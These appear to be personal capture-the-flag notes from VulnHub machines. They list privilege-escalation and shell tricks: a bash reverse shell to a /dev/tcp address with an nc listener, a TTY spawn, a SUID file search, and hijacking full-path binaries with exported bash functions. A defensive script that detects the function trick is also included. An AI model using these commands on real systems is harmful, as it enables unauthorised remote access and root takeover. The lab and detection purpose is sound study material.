Related links
- VulnHub
- Tr0ll VM which I rooted
- Tr0ll2 VM which I failed because I didn't think to try shellshock
- Great walkthrough from which I learned the nifty trick of masking a binary with a bash function name (Snippet 1)
Snippets
Spawn TTY
python -c 'import pty;pty.spawn("/bin/bash")'
Related: Why do you need tty for sudo
Redirect bash to tcp socket
/bin/bash -i >& /dev/tcp/192.168.0.107/6666 0>&1
# then at receiver:
nc -l -n -v -p 6666
# And wait for incoming bash shell
Find SUID/SGID files for privilege escalation
find / -user root -perm -4000 -print 2>/dev/null
Of course, if you can somehow exploit these results, you might get root.
Hijack a binary's full path in bash to exec your own code
$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
It works
Of course, you might want this if a SUID program is calling some binary by full path and you cannot alter that binary but want to hijack the execution.
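Added example (not from the original notes or the walkthrough): the defender's side of the same trick. Since the Shellshock fixes, bash exports functions into the environment as variables named BASH_FUNC_<name>%%, so a function that masks a full path shows up as BASH_FUNC_/usr/bin/foo%%. The script below reads an env-style dump (a constructed sample, not captured from a real host), flags such entries, and shows the mitigation of starting a child with a scrubbed environment; SAMPLE_ENV and the function names are my own.

```shell
# Constructed sample of what `env` might print in a shell where the masking
# trick from the notes has been set up (not from a real system).
SAMPLE_ENV='PATH=/usr/local/bin:/usr/bin:/bin
HOME=/home/user
BASH_FUNC_/usr/bin/foo%%=() {  /usr/bin/echo "It works"
}
BASH_FUNC_greet%%=() {  echo hi
}
SHELL=/bin/bash'

# Print the names of all exported bash functions found in an env dump on stdin.
# bash stores them as BASH_FUNC_<name>%%=() { ... }, one variable per function.
exported_function_names() {
    sed -n 's/^BASH_FUNC_\(.*\)%%=.*/\1/p'
}

# Keep only names that are absolute paths: a legitimate shell function never
# needs a name like /usr/bin/foo, so any hit is worth investigating.
path_masking_functions() {
    exported_function_names | grep '^/' || true
}

# Number of path-masking functions in SAMPLE_ENV, so a hardening check can
# fail closed when the count is non-zero.
count_path_masking() {
    printf '%s\n' "$SAMPLE_ENV" | path_masking_functions | wc -l | tr -d ' '
}

# Mitigation for a privileged program that must run another binary: never
# pass the caller's environment through. `env -i` drops every exported
# variable and function, and a C program gets the same effect by calling
# execve() with an explicit, minimal envp instead of system().
# (bash also refuses to import functions when its effective uid differs
# from its real uid, but a program that setuid()s before spawning a shell
# loses that guard, so scrubbing the environment is the reliable fix.)
run_with_clean_env() {
    env -i PATH=/usr/bin:/bin "$@"
}

# Demo: report the suspicious entry in the sample dump.
printf '%s\n' "$SAMPLE_ENV" | path_masking_functions
```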